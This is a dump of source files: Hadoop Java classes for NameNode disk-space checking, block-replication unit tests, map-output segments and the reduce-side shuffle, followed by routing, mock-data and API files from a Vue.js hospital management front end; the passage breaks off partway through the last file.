* <code>hasAvailableDiskSpace</code> - which will return true if and only if
* the NameNode has disk space available on all volumes which are configured to
* be checked. Volumes containing file system name/edits dirs are added by
* default, and arbitrary extra volumes may be configured as well.
*/
public class NameNodeResourceChecker {
private static final Log LOG = LogFactory.getLog(NameNodeResourceChecker.class.getName());
// Space (in bytes) reserved per volume.
private long duReserved;
private final Configuration conf;
private Map<String, DF> volumes;
/**
* Create a NameNodeResourceChecker, which will check the name dirs and edits
* dirs set in <code>conf</code>.
*
* @param conf
* @throws IOException
*/
public NameNodeResourceChecker(Configuration conf) throws IOException {
this.conf = conf;
volumes = new HashMap<String, DF>();
duReserved = conf.getLong(DFSConfigKeys.DFS_NAMENODE_DU_RESERVED_KEY,
DFSConfigKeys.DFS_NAMENODE_DU_RESERVED_DEFAULT);
Collection<File> extraCheckedVolumes = new ArrayList<File>();
for (String filePath : conf.getTrimmedStringCollection(
DFSConfigKeys.DFS_NAMENODE_CHECKED_VOLUMES_KEY)) {
extraCheckedVolumes.add(new File(filePath));
}
addDirsToCheck(FSNamesystem.getNamespaceDirs(conf));
addDirsToCheck(FSNamesystem.getNamespaceEditsDirs(conf));
addDirsToCheck(extraCheckedVolumes);
}
/**
* Add the passed-in directories to the list of volumes to check.
*
* @param directoriesToCheck
* The directories whose volumes will be checked for available space.
* @throws IOException
*/
private void addDirsToCheck(Collection<File> directoriesToCheck)
throws IOException {
for (File directory : directoriesToCheck) {
File dir = new File(directory.toURI().getPath());
if (!dir.exists()) {
throw new IOException("Missing directory "+dir.getAbsolutePath());
}
DF df = new DF(dir, conf);
volumes.put(df.getFilesystem(), df);
}
}
/**
* Return true if disk space is available on at least one of the configured
* volumes.
*
* @return True if the configured amount of disk space is available on at
* least one volume, false otherwise.
* @throws IOException
*/
boolean hasAvailableDiskSpace()
throws IOException {
return getVolumesLowOnSpace().size() < volumes.size();
}
/**
* Return the set of directories which are low on space.
* @return the set of directories whose free space is below the threshold.
* @throws IOException
*/
Collection<String> getVolumesLowOnSpace() throws IOException {
if (LOG.isDebugEnabled()) {
LOG.debug("Going to check the following volumes disk space: " + volumes);
}
Collection<String> lowVolumes = new ArrayList<String>();
for (DF volume : volumes.values()) {
long availableSpace = volume.getAvailable();
String fileSystem = volume.getFilesystem();
if (LOG.isDebugEnabled()) {
LOG.debug("Space available on volume '" + fileSystem + "' is " + availableSpace);
}
if (availableSpace < duReserved) {
LOG.warn("Space available on volume '" + fileSystem + "' is "
+ availableSpace +
", which is below the configured reserved amount " + duReserved);
lowVolumes.add(volume.getFilesystem());
}
}
return lowVolumes;
}
//@VisibleForTesting
void setVolumes(Map<String, DF> volumes) {
this.volumes = volumes;
}
}
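// Illustrative sketch (not part of the original file): a minimal check of the
// configured name/edits volumes; the reserved-space override below is a
// hypothetical value.
//
//   Configuration conf = new Configuration();
//   conf.setLong(DFSConfigKeys.DFS_NAMENODE_DU_RESERVED_KEY, 100L * 1024 * 1024);
//   NameNodeResourceChecker checker = new NameNodeResourceChecker(conf);
//   if (!checker.hasAvailableDiskSpace()) {
//     LOG.warn("Low on space: " + checker.getVolumesLowOnSpace());
//   }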
<|start_filename|>src/test/org/apache/hadoop/hdfs/server/namenode/TestBlockManager.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs.server.namenode;
import static org.junit.Assert.*;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import org.apache.commons.logging.impl.Log4JLogger;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.hdfs.DFSClient;
import org.apache.hadoop.hdfs.MiniDFSCluster;
import org.apache.hadoop.hdfs.protocol.Block;
import org.apache.hadoop.hdfs.protocol.DatanodeID;
import org.apache.hadoop.hdfs.protocol.DatanodeInfo;
import org.apache.hadoop.hdfs.protocol.FSConstants;
import org.apache.hadoop.hdfs.server.datanode.DataNode;
import org.apache.hadoop.hdfs.server.namenode.BlocksMap.BlockInfo;
import org.apache.hadoop.hdfs.server.namenode.FSNamesystem;
import org.apache.hadoop.hdfs.server.namenode.INodeFile;
import org.apache.hadoop.hdfs.server.protocol.BlockCommand;
import org.apache.hadoop.net.NetworkTopology;
import org.apache.hadoop.util.StringUtils;
import org.apache.log4j.Level;
import org.junit.After;
import org.junit.Before;
import org.junit.Ignore;
import org.junit.Test;
import org.mockito.Mockito;
public class TestBlockManager {
{
((Log4JLogger)NameNode.stateChangeLog).getLogger().setLevel(Level.ALL);
((Log4JLogger)LeaseManager.LOG).getLogger().setLevel(Level.ALL);
((Log4JLogger)FSNamesystem.LOG).getLogger().setLevel(Level.ALL);
((Log4JLogger)DataNode.LOG).getLogger().setLevel(Level.ALL);
((Log4JLogger)DFSClient.LOG).getLogger().setLevel(Level.ALL);
}
private final List<DatanodeDescriptor> nodes = Arrays.asList(
new DatanodeDescriptor[] {
new DatanodeDescriptor(new DatanodeID("h1:5020"), "/rackA"),
new DatanodeDescriptor(new DatanodeID("h2:5020"), "/rackA"),
new DatanodeDescriptor(new DatanodeID("h3:5020"), "/rackA"),
new DatanodeDescriptor(new DatanodeID("h4:5020"), "/rackB"),
new DatanodeDescriptor(new DatanodeID("h5:5020"), "/rackB"),
new DatanodeDescriptor(new DatanodeID("h6:5020"), "/rackB")
});
private final List<DatanodeDescriptor> rackA = nodes.subList(0, 3);
private final List<DatanodeDescriptor> rackB = nodes.subList(3, 6);
/**
* Some of these tests exercise code which has some randomness involved -
* i.e. even if there's a bug, they may pass because the random node selection
* chooses the correct result.
*
* Since they're true unit tests and run quickly, we loop them a number
* of times trying to trigger the incorrect behavior.
*/
private static final int NUM_TEST_ITERS = 30;
private static final int BLOCK_SIZE = 64*1024;
private Configuration conf;
private FSNamesystem fsn;
private MiniDFSCluster cluster;
@Before
public void setupMockCluster() throws IOException {
conf = new Configuration();
cluster = new MiniDFSCluster(conf, 0, true, null);
fsn = cluster.getNameNode().getNamesystem();
}
@After
public void tearDownCluster() throws IOException {
if (cluster != null) {
cluster.shutdown();
}
}
private void addNodes(Iterable<DatanodeDescriptor> nodesToAdd) throws IOException {
NetworkTopology cluster = fsn.clusterMap;
// construct network topology
for (DatanodeDescriptor dn : nodesToAdd) {
cluster.add(dn);
dn.updateHeartbeat(
2*FSConstants.MIN_BLOCKS_FOR_WRITE*BLOCK_SIZE, 0L,
2*FSConstants.MIN_BLOCKS_FOR_WRITE*BLOCK_SIZE, 0, 0);
fsn.unprotectedAddDatanode(dn);
fsn.unprotectedRegisterInHeartbeatMap(dn);
assertNotNull(fsn.getDatanode(dn));
}
}
/**
* Test that replication of under-replicated blocks is detected
* and basically works
*/
@Test
public void testBasicReplication() throws Exception {
addNodes(nodes);
for (int i = 0; i < NUM_TEST_ITERS; i++) {
doBasicTest(i);
}
}
/**
* Regression test for HDFS-1480
* - Cluster has 2 racks, A and B, each with three nodes.
* - Block initially written on A1, A2, B1
* - Admin decommissions two of these nodes (let's say A1 and A2 but it doesn't matter)
* - Re-replication should respect rack policy
*/
@Test
public void testTwoOfThreeNodesDecomissioned() throws Exception {
addNodes(nodes);
for (int i = 0; i < NUM_TEST_ITERS; i++) {
doTestTwoOfThreeNodesDecomissioned(i);
}
}
@Test
public void testAllNodesHoldingReplicasDecomissioned() throws Exception {
addNodes(nodes);
for (int i = 0; i < NUM_TEST_ITERS; i++) {
doTestAllNodesHoldingReplicasDecomissioned(i);
}
}
@Test
public void testOneOfTwoRacksDecomissioned() throws Exception {
addNodes(nodes);
for (int i = 0; i < NUM_TEST_ITERS; i++) {
doTestOneOfTwoRacksDecomissioned(i);
}
}
/**
* Unit test version of testSufficientlyReplBlocksUsesNewRack
*
* This test is currently ignored, since 0.20 doesn't check replication
* policy on sufficiently replicated blocks. If an additional rack is
* added to a 1-rack cluster, the replication level needs to be boosted
* and brought back down to attain the proper policy.
**/
@Test
@Ignore
public void testSufficientlyReplBlocksUsesNewRack() throws Exception {
addNodes(nodes);
for (int i = 0; i < NUM_TEST_ITERS; i++) {
doTestSufficientlyReplBlocksUsesNewRack(i);
}
}
private void doTestSufficientlyReplBlocksUsesNewRack(int testIndex) {
// Originally on only nodes in rack A.
List<DatanodeDescriptor> origNodes = rackA;
BlockInfo blockInfo = addBlockOnNodes((long)testIndex, origNodes);
DatanodeInfo[] pipeline = scheduleSingleReplication(blockInfo);
assertEquals(2, pipeline.length); // single new copy
assertTrue("Source of replication should be one of the nodes the block " +
"was on. Was: " + pipeline[0],
nodeInList(pipeline[0], origNodes));
assertTrue("Destination of replication should be on the other rack. " +
"Was: " + pipeline[1],
nodeInList(pipeline[1], rackB));
}
private void doBasicTest(int testIndex) {
List<DatanodeDescriptor> origNodes = nodesAtIndexes(0, 1);
BlockInfo blockInfo = addBlockOnNodes((long)testIndex, origNodes);
DatanodeInfo[] pipeline = scheduleSingleReplication(blockInfo);
assertEquals(2, pipeline.length);
assertTrue("Source of replication should be one of the nodes the block " +
"was on. Was: " + pipeline[0],
nodeInList(pipeline[0], origNodes));
assertTrue("Destination of replication should be on the other rack. " +
"Was: " + pipeline[1],
nodeInList(pipeline[1], rackB));
}
private void doTestTwoOfThreeNodesDecomissioned(int testIndex) throws Exception {
// Block originally on A1, A2, B1
List<DatanodeDescriptor> origNodes = nodesAtIndexes(0, 1, 3);
BlockInfo blockInfo = addBlockOnNodes(testIndex, origNodes);
// Decommission two of the nodes (A1, A2)
List<DatanodeDescriptor> decomNodes = startDecommission(0, 1);
DatanodeInfo[] pipeline = scheduleSingleReplication(blockInfo);
assertTrue("Source of replication should be one of the nodes the block " +
"was on. Was: " + pipeline[0],
nodeInList(pipeline[0], origNodes));
assertEquals("Should have two targets", 3, pipeline.length);
boolean foundOneOnRackA = false;
for (int i = 1; i < pipeline.length; i++) {
DatanodeInfo target = pipeline[i];
if (nodeInList(target, rackA)) {
foundOneOnRackA = true;
}
assertFalse(nodeInList(target, decomNodes));
assertFalse(nodeInList(target, origNodes));
}
assertTrue("Should have at least one target on rack A. Pipeline: " +
StringUtils.joinObjects(",", Arrays.asList(pipeline)),
foundOneOnRackA);
}
private boolean nodeInList(DatanodeInfo node,
List<DatanodeDescriptor> nodeList) {
for (DatanodeDescriptor candidate : nodeList) {
if (node.getName().equals(candidate.getName())) {
return true;
}
}
return false;
}
private void doTestAllNodesHoldingReplicasDecomissioned(int testIndex) throws Exception {
// Block originally on A1, A2, B1
List<DatanodeDescriptor> origNodes = nodesAtIndexes(0, 1, 3);
BlockInfo blockInfo = addBlockOnNodes(testIndex, origNodes);
// Decommission all of the nodes
List<DatanodeDescriptor> decomNodes = startDecommission(0, 1, 3);
DatanodeInfo[] pipeline = scheduleSingleReplication(blockInfo);
assertTrue("Source of replication should be one of the nodes the block " +
"was on. Was: " + pipeline[0],
nodeInList(pipeline[0], origNodes));
assertEquals("Should have three targets", 4, pipeline.length);
boolean foundOneOnRackA = false;
boolean foundOneOnRackB = false;
for (int i = 1; i < pipeline.length; i++) {
DatanodeInfo target = pipeline[i];
if (nodeInList(target, rackA)) {
foundOneOnRackA = true;
} else if (nodeInList(target, rackB)) {
foundOneOnRackB = true;
}
assertFalse(nodeInList(target, decomNodes));
assertFalse(nodeInList(target, origNodes));
}
assertTrue("Should have at least one target on rack A. Pipeline: " +
StringUtils.joinObjects(",", Arrays.asList(pipeline)),
foundOneOnRackA);
assertTrue("Should have at least one target on rack B. Pipeline: " +
StringUtils.joinObjects(",", Arrays.asList(pipeline)),
foundOneOnRackB);
}
private void doTestOneOfTwoRacksDecomissioned(int testIndex) throws Exception {
System.out.println("Begin iter " + testIndex);
// Block originally on A1, A2, B1
List<DatanodeDescriptor> origNodes = nodesAtIndexes(0, 1, 3);
BlockInfo blockInfo = addBlockOnNodes(testIndex, origNodes);
// Decommission all of the nodes in rack A
List<DatanodeDescriptor> decomNodes = startDecommission(0, 1, 2);
DatanodeInfo[] pipeline = scheduleSingleReplication(blockInfo);
assertTrue("Source of replication should be one of the nodes the block " +
"was on. Was: " + pipeline[0],
nodeInList(pipeline[0], origNodes));
assertEquals("Should have 2 targets", 3, pipeline.length);
boolean foundOneOnRackB = false;
for (int i = 1; i < pipeline.length; i++) {
DatanodeInfo target = pipeline[i];
if (nodeInList(target, rackB)) {
foundOneOnRackB = true;
}
assertFalse(nodeInList(target, decomNodes));
assertFalse(nodeInList(target, origNodes));
}
assertTrue("Should have at least one target on rack B. Pipeline: " +
StringUtils.joinObjects(",", Arrays.asList(pipeline)),
foundOneOnRackB);
}
private List<DatanodeDescriptor> nodesAtIndexes(int ... indexes) {
List<DatanodeDescriptor> ret = new ArrayList<DatanodeDescriptor>();
for (int idx : indexes) {
ret.add(nodes.get(idx));
}
return ret;
}
private List<DatanodeDescriptor> startDecommission(int ... indexes) {
List<DatanodeDescriptor> nodes = nodesAtIndexes(indexes);
for (DatanodeDescriptor node : nodes) {
node.startDecommission();
}
return nodes;
}
private BlockInfo addBlockOnNodes(long blockId, List<DatanodeDescriptor> nodes) {
INodeFile iNode = Mockito.mock(INodeFile.class);
Mockito.doReturn((short)3).when(iNode).getReplication();
Block block = new Block(blockId);
BlockInfo blockInfo = fsn.blocksMap.addINode(block, iNode);
// Add a replica of the block on each of the given nodes
for (DatanodeDescriptor dn : nodes) {
blockInfo.addNode(dn);
}
return blockInfo;
}
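/**
 * Asks the namesystem to schedule exactly one replication for the given block and
 * returns the resulting pipeline: the source datanode followed by the chosen targets.
 */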
private DatanodeInfo[] scheduleSingleReplication(Block block) {
assertEquals("Block not initially pending replication",
0, fsn.pendingReplications.getNumReplicas(block));
assertTrue("computeReplicationWork should indicate replication is needed",
fsn.computeReplicationWorkForBlock(block, 1));
assertTrue("replication is pending after work is computed",
fsn.pendingReplications.getNumReplicas(block) > 0);
List<PendingReplPipeline> pipelines = getAllPendingReplications();
assertEquals(1, pipelines.size());
assertEquals(block, pipelines.get(0).block);
return pipelines.get(0).pipeline;
}
private List<PendingReplPipeline> getAllPendingReplications() {
List<PendingReplPipeline> pendingPipelines = new ArrayList<PendingReplPipeline>();
for (DatanodeDescriptor dn : nodes) {
BlockCommand replCommand = dn.getReplicationCommand(10);
if (replCommand == null) continue;
Block[] blocks = replCommand.getBlocks();
DatanodeInfo[][] allTargets = replCommand.getTargets();
for (int i = 0; i < blocks.length; i++) {
DatanodeInfo[] targets = allTargets[i];
Block block = blocks[i];
DatanodeInfo[] pipeline = new DatanodeInfo[1 + targets.length];
pipeline[0] = dn;
System.arraycopy(targets, 0, pipeline, 1, targets.length);
pendingPipelines.add(new PendingReplPipeline(block, pipeline));
}
}
return pendingPipelines;
}
private static class PendingReplPipeline {
final Block block;
final DatanodeInfo[] pipeline;
public PendingReplPipeline(Block block, DatanodeInfo[] pipeline) {
super();
this.block = block;
this.pipeline = pipeline;
}
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/Segment.java<|end_filename|>
/**
*
*/
package org.apache.hadoop.mapred;
import java.io.IOException;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.FSDataInputStream;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.io.DataInputBuffer;
import org.apache.hadoop.io.compress.CompressionCodec;
import org.apache.hadoop.mapred.IFile.IStreamWriter;
import org.apache.hadoop.mapred.IFile.Reader;
import org.apache.hadoop.util.Progressable;
public class Segment<K extends Object, V extends Object> implements
Comparable<Segment<K, V>> {
Reader<K, V> reader = null;
final DataInputBuffer key = new DataInputBuffer();
final DataInputBuffer value = new DataInputBuffer();
Configuration conf = null;
FileSystem fs = null;
Path file = null;
boolean preserve = false;
CompressionCodec codec = null;
long segmentOffset = 0;
long segmentLength = -1;
long segmentRawLenght = -1;
Counters.Counter mapOutputsCounter = null;
public Segment(Configuration conf,
FileSystem fs,
Path file,
CompressionCodec codec,
boolean preserve) throws IOException {
this(conf, fs, file, codec, preserve, null);
}
public Segment(Configuration conf,
FileSystem fs,
Path file,
CompressionCodec codec,
boolean preserve,
Counters.Counter mergedMapOutputsCounter) throws IOException {
this(conf, fs, file, 0, fs.getFileStatus(file).getLen(), -1, codec,
preserve, mergedMapOutputsCounter);
}
public Segment(Configuration conf,
FileSystem fs,
Path file,
long segmentOffset,
long segmentLength,
CompressionCodec codec,
boolean preserve) throws IOException {
this(conf, fs, file, segmentOffset, segmentLength, -1, codec, preserve,
null);
}
public Segment(Configuration conf,
FileSystem fs,
Path file,
long segmentOffset,
long segmentLength,
long segmentRawLength,
CompressionCodec codec,
boolean preserve) throws IOException {
this(conf, fs, file, segmentOffset, segmentLength, segmentRawLength,
codec, preserve, null);
}
public Segment(Configuration conf,
FileSystem fs,
Path file,
long segmentOffset,
long segmentLength,
long segmentRawLength,
CompressionCodec codec,
boolean preserve,
Counters.Counter mergedMapOutputsCounter) throws IOException {
this.conf = conf;
this.fs = fs;
this.file = file;
this.codec = codec;
this.preserve = preserve;
this.segmentOffset = segmentOffset;
this.segmentLength = segmentLength;
this.segmentRawLenght = segmentRawLength;
this.mapOutputsCounter = mergedMapOutputsCounter;
}
public Segment(Reader<K, V> reader, boolean preserve) {
this(reader, preserve, null);
}
public Segment(Reader<K, V> reader,
boolean preserve,
Counters.Counter mapOutputsCounter) {
this.reader = reader;
this.preserve = preserve;
this.segmentLength = reader.getLength();
this.mapOutputsCounter = mapOutputsCounter;
}
public void init(Counters.Counter readsCounter) throws IOException {
if (reader == null) {
FSDataInputStream in = fs.open(file);
in.seek(segmentOffset);
reader = new Reader<K, V>(conf, in, segmentLength, segmentRawLenght,
codec, readsCounter);
}
if (mapOutputsCounter != null) {
mapOutputsCounter.increment(1);
}
}
public long getRawLen() {
return this.segmentRawLenght;
}
public boolean inMemory() {
return fs == null;
}
public DataInputBuffer getKey() {
return key;
}
public DataInputBuffer getValue() throws IOException {
nextRawValue();
return value;
}
public long getLength() {
return (reader == null) ? segmentLength : reader.getLength();
}
public boolean nextRawKey() throws IOException {
return reader.nextRawKey(key);
}
private void nextRawValue() throws IOException {
reader.nextRawValue(value);
}
void closeReader() throws IOException {
if (reader != null) {
reader.close();
reader = null;
}
}
public void close() throws IOException {
closeReader();
if (!preserve && fs != null) {
fs.delete(file, false);
}
}
public long getPosition() throws IOException {
return reader.getPosition();
}
// This method is used by BackupStore to extract the
// absolute position after a reset
long getActualPosition() throws IOException {
return segmentOffset + reader.getPosition();
}
Reader<K, V> getReader() {
return reader;
}
// This method is used by BackupStore to reinitialize the
// reader to start reading from a different segment offset
void reinitReader(int offset) throws IOException {
if (!inMemory()) {
closeReader();
segmentOffset = offset;
segmentLength = fs.getFileStatus(file).getLen() - segmentOffset;
init(null);
}
}
public void writeTo(
IStreamWriter writer,
Progressable progressable,
Configuration conf) throws IOException {
reader.dumpTo(writer, progressable, conf);
}
@Override
public int compareTo(Segment<K, V> other) {
if (this.getLength() == other.getLength()) {
return 0;
}
return this.getLength() < other.getLength() ? -1 : 1;
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/task/reduce/Shuffle.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred.task.reduce;
import java.io.IOException;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.LocalDirAllocator;
import org.apache.hadoop.io.DataInputBuffer;
import org.apache.hadoop.io.compress.CompressionCodec;
import org.apache.hadoop.mapred.Counters;
import org.apache.hadoop.mapred.JobConf;
import org.apache.hadoop.mapred.JvmContext;
import org.apache.hadoop.mapred.MapOutputFile;
import org.apache.hadoop.mapred.RawKeyValueIterator;
import org.apache.hadoop.mapred.Reducer;
import org.apache.hadoop.mapred.Reporter;
import org.apache.hadoop.mapred.Segment;
import org.apache.hadoop.mapred.Task;
import org.apache.hadoop.mapred.TaskStatus;
import org.apache.hadoop.mapred.TaskUmbilicalProtocol;
import org.apache.hadoop.mapred.Task.CombineOutputCollector;
import org.apache.hadoop.mapred.TaskAttemptID;
import org.apache.hadoop.util.Progress;
public class Shuffle<K, V> implements ExceptionReporter
{
private static final Log LOG = LogFactory.getLog(Shuffle.class);
private static final int PROGRESS_FREQUENCY = 2000;
private final TaskAttemptID reduceId;
private final JobConf jobConf;
private final Reporter reporter;
private final ShuffleClientMetrics metrics;
private final TaskUmbilicalProtocol umbilical;
private final ShuffleScheduler<K, V> scheduler;
private final MergeManager<K, V> merger;
private Throwable throwable = null;
private String throwingThreadName = null;
private final Progress copyPhase;
private final TaskStatus taskStatus;
private final Task reduceTask; // Used for status updates
private final JvmContext jvmContext;
public Shuffle(TaskAttemptID reduceId, JobConf jobConf, FileSystem localFS,
TaskUmbilicalProtocol umbilical, LocalDirAllocator localDirAllocator,
Reporter reporter, CompressionCodec codec, Class<? extends Reducer> combinerClass,
CombineOutputCollector<K, V> combineCollector, Counters.Counter spilledRecordsCounter,
Counters.Counter reduceCombineInputCounter, Counters.Counter shuffledMapsCounter,
Counters.Counter reduceShuffleBytes, Counters.Counter failedShuffleCounter,
Counters.Counter mergedMapOutputsCounter, TaskStatus status, Progress copyPhase,
Progress mergePhase, Task reduceTask, MapOutputFile mapOutputFile, JvmContext jvmContext)
{
this.reduceId = reduceId;
this.jobConf = jobConf;
this.umbilical = umbilical;
this.reporter = reporter;
this.metrics = new ShuffleClientMetrics(reduceId, jobConf);
this.copyPhase = copyPhase;
this.taskStatus = status;
this.reduceTask = reduceTask;
this.jvmContext = jvmContext;
scheduler = new ShuffleScheduler<K, V>(jobConf, status, this, copyPhase,
shuffledMapsCounter, reduceShuffleBytes, failedShuffleCounter);
merger = new MergeManager<K, V>(reduceId, jobConf, localFS, localDirAllocator, reporter,
codec, combinerClass, combineCollector, spilledRecordsCounter,
reduceCombineInputCounter, mergedMapOutputsCounter, this, mergePhase, mapOutputFile);
}
@SuppressWarnings("unchecked")
public RawKeyValueIterator run() throws IOException, InterruptedException
{
// Start the map-completion events fetcher thread
final EventFetcher<K, V> eventFetcher = new EventFetcher<K, V>(reduceId, umbilical,
scheduler, this,jvmContext,jobConf.getInt("mapreduce.shuffle.port", 8080));
eventFetcher.start();
// Start the map-output fetcher threads
final int numFetchers = jobConf.getInt("mapred.reduce.parallel.copies", 5);
Fetcher<K, V>[] fetchers = new Fetcher[numFetchers];
for (int i = 0; i < numFetchers; ++i)
{
fetchers[i] = new Fetcher<K, V>(jobConf, reduceId, scheduler, merger, reporter,
metrics, this, reduceTask.getJobTokenSecret());
fetchers[i].start();
}
// Wait for shuffle to complete successfully
while (!scheduler.waitUntilDone(PROGRESS_FREQUENCY))
{
reporter.progress();
synchronized (this)
{
if (throwable != null)
{
throw new ShuffleError("error in shuffle in " + throwingThreadName, throwable);
}
}
}
// Stop the event-fetcher thread
eventFetcher.interrupt();
try
{
eventFetcher.join();
}
catch (Throwable t)
{
LOG.info("Failed to stop " + eventFetcher.getName(), t);
}
// Stop the map-output fetcher threads
for (Fetcher<K, V> fetcher : fetchers)
{
fetcher.interrupt();
}
for (Fetcher<K, V> fetcher : fetchers)
{
fetcher.join();
}
fetchers = null;
// stop the scheduler
scheduler.close();
copyPhase.complete(); // copy is already complete
LOG.info("Shuffle(Copy) phase has complete!");
taskStatus.setPhase(TaskStatus.Phase.SORT);
reduceTask.statusUpdate(umbilical);
// Finish the on-going merges...
RawKeyValueIterator kvIter = null;
try
{
kvIter = merger.close();
}
catch (Throwable e)
{
throw new ShuffleError("Error while doing final merge ", e);
}
// Sanity check
synchronized (this)
{
if (throwable != null)
{
throw new ShuffleError("error in shuffle in " + throwingThreadName, throwable);
}
}
return kvIter;
}
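/**
 * Returns an iterator that streams raw key/value pairs directly from the fetched
 * map-output segments, one segment at a time, without performing the final
 * merge/sort. Progress is reported as the fraction of map outputs consumed so far.
 */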
public RawKeyValueIterator getUnsortedKVIterator() {
return new RawKeyValueIterator() {
private Segment<K, V> current = null;
private DataInputBuffer key;
private DataInputBuffer value;
private Progress progress = new Progress();
private int count = 0;
private final int totalMaps = jobConf.getNumMapTasks();
@Override
public boolean next() throws IOException {
if (current == null) {
current = merger.getMapOutput();
if (current == null)
return false;
current.init(null);
count++;
progress.set((float) count / totalMaps);
}
if (!current.nextRawKey()) {
current.close();
current = null;
return next();
}
key = current.getKey();
value = current.getValue();
return true;
}
@Override
public DataInputBuffer getKey() throws IOException {
return key;
}
@Override
public DataInputBuffer getValue() throws IOException {
return value;
}
@Override
public Progress getProgress() {
return progress;
}
@Override
public void close() throws IOException {
// nothing
}
};
}
public synchronized void reportException(Throwable t)
{
if (throwable == null)
{
throwable = t;
throwingThreadName = Thread.currentThread().getName();
// Notify the scheduler so that the reporting thread finds the
// exception immediately.
synchronized (scheduler)
{
scheduler.notifyAll();
}
}
}
public static class ShuffleError extends IOException
{
private static final long serialVersionUID = 5753909320586607881L;
ShuffleError(String msg, Throwable t)
{
super(msg, t);
}
}
}
| karim7262/hadoop3 |
<|start_filename|>src/router/index.js<|end_filename|>
import Vue from 'vue'
import Router from 'vue-router'
import home from './home'
import common from './common'
import doctor from './doctor'
import statistics from './statistics'
import basicInfo from './basicInfo'
import pharmacy from './pharmacy'
import register from './register'
import tech from './tech'
import patient from './patient'
Vue.use(Router);
export default new Router({
mode: 'hash', // https://router.vuejs.org/api/#mode
linkActiveClass: 'open active',
scrollBehavior: () => ({ y: 0 }),
routes: [
home,
common,
doctor,
basicInfo,
statistics,
tech,
register,
pharmacy,
patient
]
})
<|start_filename|>src/mock/pharmacy.js<|end_filename|>
import Mock from "mockjs";
export default function () {
const Random = Mock.Random;
Mock.mock(RegExp('/api/countPatientList' + ".*"), "get", {
code:true,
total:100
});
Mock.mock(RegExp('/api/getPatientList' + ".*"), "get", ()=>{
let list = [];
for(let i = 0; i < 4; i++) {
let listObject = {
id: Random.integer(100, 9999),
user_name: Random.cword(2, 4),
pay_way: Random.cword(2, 4),
status: Random.pick(['primary','secondary']),
sex:Random.pick(['男','女']),
};
list.push(listObject);
}
return {
code: true,
data: list
}});
}
<|start_filename|>src/mock/basicInfo.js<|end_filename|>
import Mock from "mockjs";
export default function () {
const Random = Mock.Random;
Mock.mock(RegExp('/api/getDepartmentCount' + ".*"), "get", {
code:true,
total:100
});
Mock.mock(RegExp('/api/getDepartmentList' + ".*"), "get", ()=>{
let list = [];
for(let i = 0; i < 99; i++) {
let listObject = {
department_Code: Random.integer(100, 9999),
department_Name: Random.cword(2, 4),
department_Type:Random.pick(['内科','外科']),
department_Category: Random.pick(['中医','西医']),
};
list.push(listObject);
}
return {
code: true,
data: list
}});
}
<|start_filename|>src/api/api.js<|end_filename|>
import axios from 'axios';
let base = '';
let hospital = 'http://localhost:8000/hospital';
export const requestLogin = params => { return axios.post(`${base}/login`, params).then(res => res.data); };
export const getUserList = params => { return axios.get(`${base}/user/list`, { params: params }); };
export const getUserListPage = params => { return axios.get(`${base}/user/listpage`, { params: params }); };
export const removeUser = params => { return axios.get(`${base}/user/remove`, { params: params }); };
export const batchRemoveUser = params => { return axios.get(`${base}/user/batchremove`, { params: params }); };
export const editUser = params => { return axios.get(`${base}/user/edit`, { params: params }); };
export const addUser = params => { return axios.get(`${base}/user/add`, { params: params }); };
// Hospital workstation endpoints
export const registrationGetAll = params => {return axios.post(`${hospital}/registrationinfo/listbycondition`, params);};
export const registrationPerform = params => {return axios.post(`${hospital}/registrationinfo/add`, params);};
export const registrationGetMedicalRecordNo = params => {return axios.post(`${hospital}/registrationinfo/getmedicalrecordno`, params);};
export const registrationWithDraw = params => {return axios.post(`${hospital}/registrationinfo/withdraw`, params);};
export const departmentGetAll = params => {return axios.post(`${hospital}/department/list`, params);};
export const doctorGetByDepartment = params => {return axios.post(`${hospital}/doctor/findbydepartment`, params);};
export const doctorGetAll = params => {return axios.post(`${hospital}/doctor/list`, params);};
<|start_filename|>src/router/doctor.js<|end_filename|>
// Containers
const DefaultContainer = () => import('../containers/DefaultContainer');
//Doctors
const DoctorHome = () => import('../views/doctor/homePage');
const FinalDiagnosis = () => import('../views/doctor/finalDiagnosis');
const PatentPrescription = () => import('../views/doctor/patentPrescription');
const HerbalPrescription = () => import('../views/doctor/herbalPrescription');
const Treatment = () => import('../views/doctor/treatment');
const ExaminationFirst = () => import('../views/doctor/examination1');
const ExaminationSecond = () => import('../views/doctor/examination2');
const TreatmentOver = () => import('../views/doctor/treatmentOver');
const ExpenseSearch = () => import('../views/doctor/expenseSearch');
export default {
path:'/doctor',
redirect:'/doctor/homePage',
name:'Doctor',
component: DefaultContainer,
children: [
{
path: 'homePage',
name: 'homePage',
component: DoctorHome
},
{
path:'finalDiagnosis',
name:'finalDiagnosis',
component:FinalDiagnosis
},
{
path:'patentPrescription',
name:'patentPrescription',
component:PatentPrescription
},
{
path:'herbalPrescription',
name:'herbalPrescription',
component:HerbalPrescription
},
{
path:'treatment',
